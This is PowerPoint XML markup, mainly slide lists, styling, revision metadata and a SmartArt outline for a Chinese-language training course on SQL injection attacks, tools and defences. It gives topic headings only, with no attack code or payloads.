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422" r:id="rId3"/>
    <p:sldId id="465" r:id="rId4"/>
    <p:sldId id="423" r:id="rId5"/>
    <p:sldId id="374" r:id="rId6"/>
    <p:sldId id="332" r:id="rId7"/>
    <p:sldId id="333" r:id="rId8"/>
    <p:sldId id="341" r:id="rId9"/>
    <p:sldId id="342" r:id="rId10"/>
    <p:sldId id="343" r:id="rId11"/>
    <p:sldId id="591" r:id="rId12"/>
    <p:sldId id="344" r:id="rId13"/>
    <p:sldId id="417" r:id="rId14"/>
    <p:sldId id="347" r:id="rId15"/>
    <p:sldId id="345" r:id="rId16"/>
    <p:sldId id="352" r:id="rId17"/>
    <p:sldId id="348" r:id="rId18"/>
    <p:sldId id="353" r:id="rId19"/>
    <p:sldId id="360" r:id="rId20"/>
    <p:sldId id="651" r:id="rId21"/>
    <p:sldId id="401" r:id="rId22"/>
    <p:sldId id="424" r:id="rId23"/>
    <p:sldId id="425" r:id="rId24"/>
    <p:sldId id="547" r:id="rId25"/>
    <p:sldId id="416" r:id="rId26"/>
    <p:sldId id="430" r:id="rId27"/>
    <p:sldId id="359" r:id="rId28"/>
    <p:sldId id="426" r:id="rId29"/>
    <p:sldId id="427" r:id="rId30"/>
    <p:sldId id="428" r:id="rId31"/>
    <p:sldId id="429" r:id="rId32"/>
    <p:sldId id="419" r:id="rId33"/>
    <p:sldId id="355" r:id="rId34"/>
    <p:sldId id="358" r:id="rId35"/>
    <p:sldId id="507" r:id="rId36"/>
    <p:sldId id="509" r:id="rId37"/>
    <p:sldId id="508" r:id="rId38"/>
    <p:sldId id="510" r:id="rId39"/>
    <p:sldId id="703" r:id="rId40"/>
    <p:sldId id="361" r:id="rId41"/>
    <p:sldId id="512" r:id="rId42"/>
    <p:sldId id="513" r:id="rId43"/>
    <p:sldId id="519" r:id="rId44"/>
    <p:sldId id="517" r:id="rId45"/>
    <p:sldId id="518" r:id="rId46"/>
    <p:sldId id="520" r:id="rId47"/>
    <p:sldId id="521" r:id="rId48"/>
    <p:sldId id="522" r:id="rId49"/>
    <p:sldId id="523" r:id="rId50"/>
    <p:sldId id="524" r:id="rId51"/>
    <p:sldId id="525" r:id="rId52"/>
    <p:sldId id="526" r:id="rId53"/>
    <p:sldId id="527" r:id="rId54"/>
    <p:sldId id="420" r:id="rId55"/>
    <p:sldId id="356" r:id="rId56"/>
    <p:sldId id="364" r:id="rId57"/>
    <p:sldId id="528" r:id="rId58"/>
    <p:sldId id="400" r:id="rId59"/>
    <p:sldId id="366" r:id="rId60"/>
    <p:sldId id="365" r:id="rId61"/>
    <p:sldId id="652" r:id="rId62"/>
    <p:sldId id="702" r:id="rId63"/>
    <p:sldId id="421" r:id="rId64"/>
    <p:sldId id="357" r:id="rId65"/>
    <p:sldId id="351" r:id="rId66"/>
    <p:sldId id="529" r:id="rId67"/>
    <p:sldId id="531" r:id="rId68"/>
    <p:sldId id="544" r:id="rId69"/>
    <p:sldId id="650" r:id="rId70"/>
    <p:sldId id="647" r:id="rId71"/>
    <p:sldId id="530" r:id="rId72"/>
    <p:sldId id="288" r:id="rId73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B7B7B"/>
    <a:srgbClr val="858585"/>
    <a:srgbClr val="D8D8D8"/>
    <a:srgbClr val="DEDEDE"/>
    <a:srgbClr val="3BB3C2"/>
    <a:srgbClr val="68B92E"/>
    <a:srgbClr val="E77817"/>
    <a:srgbClr val="68B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53556-4912-4D45-9A5F-E053B071B858}" v="1" dt="2022-08-18T07:39:31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86068" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="854" y="45"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2151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kuli" userId="c0d0dbbef34e407e" providerId="LiveId" clId="{4F953556-4912-4D45-9A5F-E053B071B858}"/>
    <pc:docChg chg="undo custSel modSld">
      <pc:chgData name="zhong kuli" userId="c0d0dbbef34e407e" providerId="LiveId" clId="{4F953556-4912-4D45-9A5F-E053B071B858}" dt="2022-08-18T03:53:20.263" v="12"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="zhong kuli" userId="c0d0dbbef34e407e" providerId="LiveId" clId="{4F953556-4912-4D45-9A5F-E053B071B858}" dt="2022-08-18T01:24:23.934" v="9" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="345"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="zhong kuli" userId="c0d0dbbef34e407e" providerId="LiveId" clId="{4F953556-4912-4D45-9A5F-E053B071B858}" dt="2022-08-18T01:24:23.934" v="9" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="345"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="zhong kuli" userId="c0d0dbbef34e407e" providerId="LiveId" clId="{4F953556-4912-4D45-9A5F-E053B071B858}" dt="2022-08-18T03:53:20.263" v="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="374"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="zhong kuli" userId="c0d0dbbef34e407e" providerId="LiveId" clId="{4F953556-4912-4D45-9A5F-E053B071B858}" dt="2022-08-18T03:53:20.263" v="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="37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F5DE7-46E2-4A2D-98A1-DC2CC20C4E3A}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart#1" loCatId="hierarchy" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5#1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AB7FFBE5-6742-4F14-A696-E1B8349261A8}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>课程大纲</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2AF4B42-4678-48CB-AD11-D43BB7DE7D3D}" type="parTrans" cxnId="{3A8530D2-41DA-4AC2-8678-E970F281CC83}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D6A14D2-B4B5-4B35-8780-1804EB056104}" type="sibTrans" cxnId="{3A8530D2-41DA-4AC2-8678-E970F281CC83}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A75D5832-D905-42D6-8426-CEF2AD24E281}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>上午</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{594F81ED-B195-4595-8260-3AE55741C979}" type="parTrans" cxnId="{2A93D223-D683-488C-B948-E0DCC122161B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60E47951-BC28-4696-8773-176E5AD0E0C4}" type="sibTrans" cxnId="{2A93D223-D683-488C-B948-E0DCC122161B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CC188D0-1E55-44E7-A454-FF45DE850C44}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>下午</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F461A8D-1113-4F1E-87E9-01BD9FC239B5}" type="parTrans" cxnId="{EF0D74C7-FBB9-4CB3-B731-AD5849F4C8F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CA26AF7-EEFE-44C9-8A2F-33ABB044C649}" type="sibTrans" cxnId="{EF0D74C7-FBB9-4CB3-B731-AD5849F4C8F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7C79791-DAC3-4614-84A6-C8F50FF3907E}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>初步认识</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6651EDBC-9F55-43DE-9361-856F68DB5B62}" type="parTrans" cxnId="{BF5C2BB7-CB4C-421A-A6C3-4531A901CBC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{155E5C9F-1E2F-4B9E-955D-56819DD96EA5}" type="sibTrans" cxnId="{BF5C2BB7-CB4C-421A-A6C3-4531A901CBC8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD3D0444-E0CA-4FEA-A374-43E83D974C8A}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>实操演练</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FA28E74-9FD7-485C-8210-F5BCCE7FF11B}" type="parTrans" cxnId="{25949BBA-5545-4548-A468-498A1068C7D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F10D19C-A4DC-4CB9-ACB4-D9E931E1CFD8}" type="sibTrans" cxnId="{25949BBA-5545-4548-A468-498A1068C7D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E41443D9-23C3-467B-A625-E0EF1CCE39BF}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>利用方式</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7D72677-0D3E-408E-9466-4F91EA396335}" type="parTrans" cxnId="{72D9F58D-2B4E-49B8-9343-6F0821C8964F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24B02EA2-EAA9-4987-B24F-8904128C8FB5}" type="sibTrans" cxnId="{72D9F58D-2B4E-49B8-9343-6F0821C8964F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E26EC3B-911D-4C5B-A54D-16AEA02BEC72}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>工具使用</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C071A949-7831-4852-8093-869653EFD4CE}" type="parTrans" cxnId="{E04BF710-7C86-419F-A143-5E464886EF5C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39583570-0157-4632-A237-0FB2935CF870}" type="sibTrans" cxnId="{E04BF710-7C86-419F-A143-5E464886EF5C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F92BB67-20AE-471F-87F7-AEC93461C1AA}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>什么是</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>注入</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B88C4B99-46A8-4D15-9193-ED493B58441D}" type="parTrans" cxnId="{115BBE6F-C3BD-4499-9745-A9057C28241F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95E6C7FC-415A-4999-BD17-1EE1E6AE7DC6}" type="sibTrans" cxnId="{115BBE6F-C3BD-4499-9745-A9057C28241F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F70B34A0-B225-4EC4-AB08-E00448796FE8}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>注入危害</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1BBB006-1878-48A1-B65F-2D4B8D2F5B64}" type="parTrans" cxnId="{C93321ED-B954-4C82-A5B1-75B8BCF62F3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54D94005-3C0A-4F58-93F6-876A12865475}" type="sibTrans" cxnId="{C93321ED-B954-4C82-A5B1-75B8BCF62F3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC214ED9-6C39-4E25-8971-BBF104C7F02F}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>注入攻击基础</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABEF44D6-0D00-42DF-B58A-5C5D2E292465}" type="parTrans" cxnId="{5F2FAC4B-99EF-4AC0-B43A-E7EC3EC9DE0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0C150866-0412-4628-856A-E0CB38B532DB}" type="sibTrans" cxnId="{5F2FAC4B-99EF-4AC0-B43A-E7EC3EC9DE0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4393166-0E5D-41AD-A9A8-98257BCF8319}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>进阶利用</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E063CA13-A778-47DC-89B2-6987D6B44904}" type="parTrans" cxnId="{2462DB4E-9939-4379-A9C8-339727CF5017}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{359C5087-903C-4B37-8A35-0F9AE1C1DF68}" type="sibTrans" cxnId="{2462DB4E-9939-4379-A9C8-339727CF5017}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0EDF3587-ACA7-46F3-AE3A-8A76638C033C}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>手动渗透工具</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A61A0F9-4C0E-4752-8DA5-80A7072EEE00}" type="parTrans" cxnId="{059D07D7-AD6B-4CC2-8245-93501E4AA989}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5BC3665B-A841-49BC-BE9E-3F39EDF04214}" type="sibTrans" cxnId="{059D07D7-AD6B-4CC2-8245-93501E4AA989}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9603295-FF70-4763-8986-B74E0100B079}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>自动渗透工具</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A929A432-53ED-4FEB-A9B1-1E484FB60B99}" type="parTrans" cxnId="{E8526E76-1778-4ED3-8F91-4F0FB9AAA484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{593A3E61-46B2-40D5-A2CD-84127D08B2B9}" type="sibTrans" cxnId="{E8526E76-1778-4ED3-8F91-4F0FB9AAA484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05C72264-8CCB-4E66-B0D2-3C913F5C93DE}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>手动</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>注入练习</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0EE8BA1-5B09-4A21-B4B0-F606B0A69C72}" type="parTrans" cxnId="{3E0554D5-E62B-4880-B1BA-001A297553B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{70C35B91-B2CA-42FD-B84E-A52286EC2F62}" type="sibTrans" cxnId="{3E0554D5-E62B-4880-B1BA-001A297553B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55B1588D-6297-4F8E-9792-9B988FE3A596}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>工具</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>注入练习</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D27572B-DAB2-4EB4-B42A-A617C44D503A}" type="parTrans" cxnId="{044737C2-0FE4-438A-B58E-865F543AD4B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6BD90E4-C80A-47C8-BF97-0DF7D509E9F6}" type="sibTrans" cxnId="{044737C2-0FE4-438A-B58E-865F543AD4B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1C9124E-BE92-402B-95F4-D48339861FE6}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>防护方法</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B1F3834-0CC4-4FC2-A759-9E4F9E65BFEE}" type="sibTrans" cxnId="{E563B41A-E1C4-4229-A1E0-47B15249321F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C81FF79-69F7-46D8-9CB7-177161DEA030}" type="parTrans" cxnId="{E563B41A-E1C4-4229-A1E0-47B15249321F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05CF87B5-5BBD-4E88-B958-D4123AAF5492}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>编码规范</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00881477-6B30-4573-BB56-6E9C82FAFD6C}" type="sibTrans" cxnId="{DD7A6D72-26F6-42AE-B554-BE18221D8330}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30817880-1468-4A0F-B10B-DE4F68765417}" type="parTrans" cxnId="{DD7A6D72-26F6-42AE-B554-BE18221D8330}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D51F257-6890-4DAE-8441-AE627F431451}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>配置加固</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8158B006-69D3-4F4D-8BB6-897CB7C37CE4}" type="sibTrans" cxnId="{83ABAA57-0B70-4FEA-980C-11407035CBD6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1CF60F7-767D-4108-8BAB-9B671543318A}" type="parTrans" cxnId="{83ABAA57-0B70-4FEA-980C-11407035CBD6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{221EE7F3-5D7B-497F-B431-3EC05FFD052D}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>设备防护</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43A09D78-5248-4012-8360-C7AE75F90AAE}" type="parTrans" cxnId="{BDEB485A-E436-489C-AC4B-F9E86F77A0BC}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EB2176D-4B86-4108-96CA-C9DA53834426}" type="sibTrans" cxnId="{BDEB485A-E436-489C-AC4B-F9E86F77A0BC}">
      <dgm:prSet/>
      <dgm:spPr/>
